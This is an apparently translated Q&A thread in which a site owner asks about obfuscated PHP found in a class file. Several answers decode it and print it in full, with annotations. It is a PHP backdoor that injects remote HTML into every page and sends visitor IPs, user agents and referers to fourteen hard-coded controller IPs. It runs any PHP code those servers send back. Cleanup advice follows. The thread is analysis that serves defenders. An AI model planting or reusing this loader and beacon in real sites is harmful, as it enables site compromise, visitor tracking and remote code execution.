
不久前,我为一位遇到问题的客户搭建了一个网站。进入站点文件后,我在其中一个 PHP 类的顶部发现了下面这段代码:

<?php
// Obfuscated loader found at the top of the class file. The paired marker comments
// (/*..._on*/ ... /*..._off*/) bracket the injected span and are the easiest string to
// search for across the rest of the site when hunting for further infected files.
//
// How the layer below decodes itself (each step is visible in this line):
//   - the helper function turns an array of numbers into a string with chr(value - offset);
//   - first array  - 8658 -> "eval"
//   - second array - 8470 -> "create_function"
//   - third array  - 7352 -> "base64_decode"
//   - create_function('$kiNmYfN', 'eval(base64_decode($kiNmYfN));') builds a one-argument
//     closure, which is then called with $UbjPmIKWlC (the next layer; the blob itself is
//     redacted in this copy of the page).
// So the only thing this line ever does is base64-decode and eval the next layer; the
// answers below show what that decoded payload contains. For detection, the
// chr(... - offset) decoder loop and the create_function/eval pairing are the signatures
// worth flagging, independent of the random identifier names.
/*ad0b18735e68b25aa9c4374221824db5_on*/ $byJtFKIhXRt8KPNfT1me8ooOBXon8QgWfQgLqPSdxb= array('8759','8776','8755','8766');$ARPcAGpFFDTk4GyiFfpsl5zXmfFqCHsAp8DQFSlbm5lhCJq8P= array('8569','8584','8571','8567','8586','8571','8565','8572','8587','8580','8569','8586','8575','8581','8580');$J0BQOOWj4oRnP7liN= array('7450','7449','7467','7453','7406','7404','7447','7452','7453','7451','7463','7452','7453');$UbjPmIKWlC="eval(base64_decode("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")); ";if (!function_exists("Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ")){ function Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($fmG17jH6h8R6pfvV6ODRd6K,$iot3u6fS){$AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7 = '';foreach($fmG17jH6h8R6pfvV6ODRd6K as $seJ3kuSEl4K8TkDMQJMs34XHkz5KM2gM6QFgboLmiml2wOFdoh){$AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7 .= chr($seJ3kuSEl4K8TkDMQJMs34XHkz5KM2gM6QFgboLmiml2wOFdoh - $iot3u6fS);}return $AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7;}$hKVywz3gfZQjZpsdvfedFEEg3UyYs7BlInK4MDaRsR1h6 = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($byJtFKIhXRt8KPNfT1me8ooOBXon8QgWfQgLqPSdxb,8658);$UsopvTU00NLoC = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($ARPcAGpFFDTk4GyiFfpsl5zXmfFqCHsAp8DQFSlbm5lhCJq8P,8470);$D4fUhPPUiQCBxt = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($J0BQOOWj4oRnP7liN,7352);$UCUMQ98AUYryzF0tSVyD = $UsopvTU00NLoC('$kiNmYfN',$hKVywz3gfZQjZpsdvfedFEEg3UyYs7BlInK4MDaRsR1h6.'('.$D4fUhPPUiQCBxt.'($kiNmYfN));');$UCUMQ98AUYryzF0tSVyD($UbjPmIKWlC);} /*ad0b18735e68b25aa9c4374221824db5_off*/ ?>

我不知道它是什么,也无法破译它。直接在线访问该文件时没有任何输出。有什么想法吗?它看起来像是恶意代码吗?




You most certainly got hacked.

I had some fun poking into the code.

The code is base64-encoded multiple times and then eval'd. The decoded result is:

if (!function_exists("GetMama")){  
// Output-buffer filter: injects the attacker-supplied HTML held in $_SERVER["good"]
// (populated by ahfudflfzdhfhs() from the remote response) into the page being served.
// str_ireplace() with identical needle and replacement is only used to count matches
// into $cnt_h; the injection happens only when exactly one tag is present.
function mod_con($buf){

// Count <body> tags (case-insensitive); the replace itself is a no-op.
str_ireplace("<body>","<body>",$buf,$cnt_h);

if ($cnt_h == 1) {

// Exactly one <body>: the injected content goes right after it.
$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf);
 return $buf;}

// Otherwise look for a single </body> and inject just before it.
str_ireplace("</body>","</body>",$buf,$cnt_h);

if ($cnt_h == 1) {
$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); 

return $buf;}
// No unique <body>/</body>: the page passes through untouched.
return $buf;}

// ob_start() callback (registered below): runs mod_con() over the complete response,
// transparently handling gzip-compressed output so the injection survives compression.
function opanki($buf){
$gz_e = false;$h_l = headers_list();

// Detect whether the application already gzipped its output.
if (in_array("Content-Encoding: gzip", $h_l)) { $gz_e = true;}

if ($gz_e){

// Round-trips through a temp file to decompress, modify, and re-compress.
// IR note: tempnam("/tmp", "FOO") briefly leaves a FOO* file in /tmp -- a host artifact.
$tmpfname = tempnam("/tmp", "FOO");

file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");

// Reads at most 10,000,000 bytes; a larger decompressed body would be truncated here.
$contents = gzread($zd, 10000000);

$contents = mod_con($contents);

gzclose($zd);

unlink($tmpfname);

$contents = gzencode($contents);} 

else {

$contents = mod_con($buf);}

$len = strlen($contents);

// Content-Length is rewritten so the extra bytes do not break response framing.
header("Content-Length: ".$len);

return($contents);} 

// Returns the "mother" value sent in the beacon URL. The function's existence is also
// what the surrounding if (!function_exists("GetMama")) guard checks, so a file that
// is included twice only installs the filter once.
function GetMama(){
$mother = "mdrmediagroup.com";

return $mother;}

// Installs opanki() as the output filter for every response rendered by this process.
ob_start("opanki");

// Beacon / command fetch. $pa is one of the hard-coded IPs from the list below.
// Sends the infected file's path plus the visitor's host, IP, referer, user agent and
// query string to http://<ip>/jedi.php, then acts on the reply:
//   - a reply containing "eval" is executed as PHP and the request is terminated;
//   - a reply containing "ebna" becomes the HTML that mod_con() injects.
// Returns true only after a usable "ebna" reply, so the caller stops trying other IPs.
// Network IoC: outbound GET for /jedi.php?version=0993&mother=... from the web server.
function ahfudflfzdhfhs($pa){

$mama = GetMama();

$file = urlencode(__FILE__);

// Each request attribute is collected if present, otherwise sent as an empty string.
if (isset($_SERVER["HTTP_HOST"])){

$host = $_SERVER["HTTP_HOST"];} else {

$host = "";}

if (isset($_SERVER["REMOTE_ADDR"])){

$ip = $_SERVER["REMOTE_ADDR"];} else {

$ip = "";}if (isset($_SERVER["HTTP_REFERER"])){

$ref = urlencode($_SERVER["HTTP_REFERER"]);}

 else {

$ref = "";}

if (isset($_SERVER["HTTP_USER_AGENT"])){

$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));}

 else {

$ua = "";}

if (isset($_SERVER["QUERY_STRING"])){

$qs = urlencode($_SERVER["QUERY_STRING"]);}

 else {$qs = "";}

// Plain HTTP on port 80; the full query string is logged on any egress proxy.
$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;

// Three transports, first one available wins: curl, then file_get_contents (only if
// allow_url_fopen is on), then a hand-written HTTP/1.0 request over fsockopen.
$try = true;

if( function_exists("curl_init") ){

$ch = curl_init($url_0 . $url_1);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

// 3 s timeout here and 30 s below: an unreachable controller shows up as slow pages.
curl_setopt($ch, CURLOPT_TIMEOUT, 3);

$ult = trim(curl_exec($ch));

$try = false;}

 if ((ini_get("allow_url_fopen")) && $try) {

// @ hides the warning a failed fetch would otherwise write to the error log.
$ult = trim(@file_get_contents($url_0 . $url_1));

$try = false;}

if($try){

$fp = fsockopen($pa, 80, $errno, $errstr, 30);

if ($fp) {

$out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);

$ret = "";

while (!feof($fp)) {

$ret  .=  fgets($fp, 128);}

// Body starts after the first blank line of the raw HTTP response.
fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));

}}  

// Remote code execution path: the controller's reply (minus the "eval" marker) is run
// as PHP on this server, and exit() ends the request without rendering the page.
if (strpos($ult,"eval") !== false){

$z = stripslashes(str_replace("eval","",$ult));

 eval($z);

 exit();}

// Injection path: the remainder of the reply is stored for mod_con() to insert.
if (strpos($ult,"ebna") !== false){$_SERVER["good"] = str_replace("ebna","",$ult);

return true;}

else {
return false;}}

// Controller candidates: 14 hard-coded IPs (network IoCs worth blocking and searching
// access/egress logs for). The order is shuffled per request and the loop stops at the
// first IP that answers with injectable content. The final brace closes the
// function_exists("GetMama") guard that wraps the whole payload.
$father2[] = "77.81.241.253";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "31.184.234.96";$father2[] = "77.95.18.189";$father2[] = "93.170.137.22";$father2[] = "188.40.95.244";$father2[] = "199.115.231.58";$father2[] = "82.192.87.178";$father2[] = "216.246.99.215";$father2[] = "95.211.18.79";shuffle($father2);foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) { break ;}}}
于 2012-04-18T21:20:28.740 回答

如果您和您的任何开发人员都不知道它的来源,那么我猜您的网站已经被入侵了 :( 。当务之急是执行以下操作:

  1. 清理所有文件。
  2. 立即切换到安全的 FTP 访问方式
  3. 在互联网上对这种攻击进行更多研究,看看您需要采取哪些其他措施。

您需要尽快处理,因为 Chrome 和 Firefox 等浏览器很快就会注意到它,并开始向用户提示您的网站是恶意网站。

于 2012-04-18T21:10:35.117 回答

是的,这是恶意代码:它是一组经过 base64 编码、随后被 eval 执行的字符串,解码后得到的代码是:

    <?php 
// Same decoded payload as in the answer above, re-indented by the poster. The indentation
// is cosmetic (several closing braces share a line with the next definition), so read it
// by the braces rather than the columns.
// Summary for defenders: an output-buffer filter (opanki -> mod_con) injects the HTML held
// in $_SERVER["good"] into every page, and ahfudflfzdhfhs() sends request metadata to one
// of 14 hard-coded IPs, whose reply is either executed with eval() or stored for injection.
if (!function_exists("GetMama")){
    // Injects $_SERVER["good"] after a lone <body>, or before a lone </body>.
    function mod_con($buf){
        str_ireplace("<body>","<body>",$buf,$cnt_h);
        if ($cnt_h == 1) {
            $buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf);
            return $buf;
        }
        str_ireplace("</body>","</body>",$buf,$cnt_h);
        if ($cnt_h == 1) {
            $buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf);
            // opanki() starts on the same line: the ob_start() callback that runs mod_con()
            // over the response, decompressing gzip output via a temp file when needed.
            return $buf;}return $buf;}function opanki($buf){
                $gz_e = false;
                $h_l = headers_list();
                if (in_array("Content-Encoding: gzip", $h_l)) {
                    $gz_e = true;
                }if ($gz_e){
                    $tmpfname = tempnam("/tmp", "FOO");
                    file_put_contents($tmpfname, $buf);
                    $zd = gzopen($tmpfname, "r");
                    $contents = gzread($zd, 10000000);
                    $contents = mod_con($contents);
                    gzclose($zd);unlink($tmpfname);
                    $contents = gzencode($contents);
                } else {$contents = mod_con($buf);}
                $len = strlen($contents);
                // Content-Length is rewritten so the injected bytes keep the response well-formed.
                header("Content-Length: ".$len);
                return($contents);}
                // "mother" value sent in the beacon; also the function_exists() guard's marker.
                function GetMama(){
                    $mother = "mdrmediagroup.com";
                    return $mother;}ob_start("opanki");
                    // Beacon: posts file path + visitor details to http://<ip>/jedi.php and acts on the reply.
                    function ahfudflfzdhfhs($pa){
                        $mama = GetMama();
                        $file = urlencode(__FILE__);
                        if (isset($_SERVER["HTTP_HOST"])){
                            $host = $_SERVER["HTTP_HOST"];
                        } else {
                            $host = "";
                        }if (isset($_SERVER["REMOTE_ADDR"])){
                            $ip = $_SERVER["REMOTE_ADDR"];
                        } else {$ip = "";
                        }if (isset($_SERVER["HTTP_REFERER"])){
                            $ref = urlencode($_SERVER["HTTP_REFERER"]);
                        } else {$ref = "";}
                        if (isset($_SERVER["HTTP_USER_AGENT"])){
                            $ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));} else {
                                $ua = "";
                            }if (
                            isset($_SERVER["QUERY_STRING"])){
                                $qs = urlencode($_SERVER["QUERY_STRING"]);
                            } else {$qs = "";}
                            $url_0 = "http://" . $pa;
                            // Network IoC: this query string appears in egress/proxy logs.
                            $url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
                            $try = true;
                            // Transports tried in order: curl, file_get_contents, raw socket.
                            if( function_exists("curl_init") ){
                                $ch = curl_init($url_0 . $url_1);
                                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                                curl_setopt($ch, CURLOPT_TIMEOUT, 3);
                                $ult = trim(curl_exec($ch));
                                $try = false;
                            } if ((ini_get("allow_url_fopen")) && $try) {
                                $ult = trim(@file_get_contents($url_0 . $url_1));
                                $try = false;
                            }if($try){
                                $fp = fsockopen($pa, 80, $errno, $errstr, 30);
                                if ($fp) {$out = "GET $url_1 HTTP/1.0\r\n";
                                $out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";
                                fwrite($fp, $out);$ret = "";
                                while (!feof($fp)) {
                                    $ret  .=  fgets($fp, 128);
                                }fclose($fp);
                                $ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
                                }
                            }
                            // Remote code execution: reply minus "eval" is run as PHP, then the request exits.
                            if (strpos($ult,"eval") !== false){
                                $z = stripslashes(str_replace("eval","",$ult));
                                eval($z);
                                exit();
                            }if (strpos($ult,"ebna") !== false){
                                // Injection: the remainder of the reply is what mod_con() inserts.
                                $_SERVER["good"] = str_replace("ebna","",$ult);return true;
                            }else {return false;}}
                            // Controller candidates (network IoCs); shuffled, first usable reply wins.
                            $father2[] = "77.81.241.253";
                            $father2[] = "46.249.58.135";
                            $father2[] = "176.9.241.150";
                            $father2[] = "46.37.169.56";
                            $father2[] = "94.242.255.35";
                            $father2[] = "178.162.129.223";
                            $father2[] = "31.184.234.96";
                            $father2[] = "77.95.18.189";
                            $father2[] = "93.170.137.22";
                            $father2[] = "188.40.95.244";
                            $father2[] = "199.115.231.58";
                            $father2[] = "82.192.87.178";
                            $father2[] = "216.246.99.215";
                            $father2[] = "95.211.18.79";
                            shuffle($father2);
                            foreach($father2 as $ur){
                                if ( ahfudflfzdhfhs($ur) ) { break ;}
                            }
}


?>
于 2012-04-18T21:27:28.290 回答

要扩展我的评论...

您是否使用了 CMS(WordPress、Joomla 等)?如果是,一些第三方插件和主题的开发者会尝试对他们的代码进行加密,以免被盗版……

如果您从头开始编写网站,请往下看。

你是唯一的开发者吗?

(是)--> 你被黑了。--> 检查你的日志文件。--> 寻找异常活动/入侵尝试。--> 尝试找到漏洞并修补它。--> 删除恶意代码。

(否)--> 询问其他开发人员是否是他们放在那里的。如果答案是否定的,请按上述方案处理。

正如 Khan 所说,时间在一定程度上至关重要,因为 Google 和 Web of Trust 等服务会开始把您的网站标记为恶意网站。同时,不要直接删除这段外来代码:如果您之后设法解开它,或许就能弄清楚它的作用以及它向谁报告——也就是黑客是谁。

还要查看服务器日志……如果您的服务器已被 root(攻击者取得了 root 权限),那么阻止黑客的唯一方法就是重新安装系统。

代码是:

// Hand-unpacked copy of the same payload shown in the other answers. NOTE(review): this
// rendering is damaged and is not runnable as printed -- the "<body>" / "</body>" string
// arguments to str_ireplace() were stripped (they read "" here), __FILE__ appears as FILE,
// and the eval($z) call is broken across two lines. Compare with the listing above
// before treating any of those differences as meaningful.
if (!function_exists("GetMama"))
{ 
    // Injects $_SERVER["good"] after a lone <body>, or before a lone </body>
    // (the tag strings are missing in this rendering).
    function mod_con($buf){
        str_ireplace("","",$buf,$cnt_h);

        if ($cnt_h == 1) {
            $buf = str_ireplace("","" . stripslashes($_SERVER["good"]),$buf); 
            return $buf;
        }

        str_ireplace("","",$buf,$cnt_h);
        if ($cnt_h == 1) {
            $buf = str_ireplace("",stripslashes($_SERVER["good"])."",$buf);
            return $buf;
        }

        return $buf;
    }

    // ob_start() callback: runs mod_con() over the whole response, transparently
    // decompressing and re-compressing gzip output via a temp file in /tmp.
    function opanki($buf){
        $gz_e = false;$h_l = headers_list();

        if (in_array("Content-Encoding: gzip", $h_l)) {
            $gz_e = true;
        }

        if ($gz_e){
            $tmpfname = tempnam("/tmp", "FOO");
            file_put_contents($tmpfname, $buf);
            $zd = gzopen($tmpfname, "r");
            $contents = gzread($zd, 10000000);
            $contents = mod_con($contents);
            gzclose($zd);
            unlink($tmpfname);
            $contents = gzencode($contents);
        } 

        else {
            $contents = mod_con($buf);
        }

        $len = strlen($contents);
        // Content-Length is rewritten so the injected bytes keep the response well-formed.
        header("Content-Length: ".$len);
        return($contents);
    } 

    // "mother" value sent in the beacon; its existence is the guard's marker.
    function GetMama(){
        $mother = "mdrmediagroup.com";
        return $mother;
    }

    // Installs the filter on every response from this process.
    ob_start("opanki");

    // Beacon: sends the file path and visitor details to http://<ip>/jedi.php and acts
    // on the reply -- "eval" replies are executed as PHP, "ebna" replies become the
    // injected HTML. Returns true only after a usable "ebna" reply.
    function ahfudflfzdhfhs($pa){
        $mama = GetMama();
        // __FILE__ in the original; the underscores were lost in this rendering.
        $file = urlencode(FILE);

        if (isset($_SERVER["HTTP_HOST"])){
            $host = $_SERVER["HTTP_HOST"];
        } else {
            $host = "";
        }

        if (isset($_SERVER["REMOTE_ADDR"])){
            $ip = $_SERVER["REMOTE_ADDR"];
        } 

        else {
            $ip = "";
        }

        if (isset($_SERVER["HTTP_REFERER"])){
            $ref = urlencode($_SERVER["HTTP_REFERER"]);
        } 

        else {
            $ref = "";
        }

        if (isset($_SERVER["HTTP_USER_AGENT"])){
            $ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
        } 

        else {
            $ua = "";
        }

        if (isset($_SERVER["QUERY_STRING"])){
            $qs = urlencode($_SERVER["QUERY_STRING"]);
        } 

        else {
            $qs = "";
        }

        // Network IoC: plain-HTTP GET with this query string from the web server.
        $url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;

        // Transports tried in order: curl (3 s timeout), file_get_contents, raw socket (30 s).
        $try = true;

        if( function_exists("curl_init") ){

            $ch = curl_init($url_0 . $url_1);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_TIMEOUT, 3);
            $ult = trim(curl_exec($ch));
            $try = false;
        } 

        if ((ini_get("allow_url_fopen")) && $try) {
            $ult = trim(@file_get_contents($url_0 . $url_1));
            $try = false;
        }

        if($try){
            $fp = fsockopen($pa, 80, $errno, $errstr, 30);

            if ($fp) {
                $out = "GET $url_1 HTTP/1.0\r\n";
                $out .= "Host: $pa\r\n";
                $out .= "Connection: Close\r\n\r\n";
                fwrite($fp, $out);
                $ret = "";

                while (!feof($fp)) {
                    $ret .= fgets($fp, 128);
                }

                fclose($fp);

                $ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
            }

        } 

        // Remote code execution path; "e" / "val($z)" is eval($z) split by the rendering.
        if (strpos($ult,"eval") !== false){
            $z = stripslashes(str_replace("eval","",$ult)); e
            val($z); 
            exit();
        }

        // Injection path: the remainder of the reply is what mod_con() inserts.
        if (strpos($ult,"ebna") !== false){
            $_SERVER["good"] = str_replace("ebna","",$ult);
            return true;
        }

        else {
            return false;
        }

    }

    // Controller candidates (network IoCs); shuffled, first usable reply wins.
    $father2[] = "77.81.241.253";
    $father2[] = "46.249.58.135";
    $father2[] = "176.9.241.150";
    $father2[] = "46.37.169.56";
    $father2[] = "94.242.255.35";
    $father2[] = "178.162.129.223";
    $father2[] = "31.184.234.96";
    $father2[] = "77.95.18.189";
    $father2[] = "93.170.137.22";
    $father2[] = "188.40.95.244";
    $father2[] = "199.115.231.58";
    $father2[] = "82.192.87.178";
    $father2[] = "216.246.99.215";
    $father2[] = "95.211.18.79";

    shuffle($father2);

    foreach($father2 as $ur){
        if ( ahfudflfzdhfhs($ur) ) {
            break ;
        }
    }
}

手工解包并重新排版,因此更易读 :)

于 2012-04-18T21:17:04.193 回答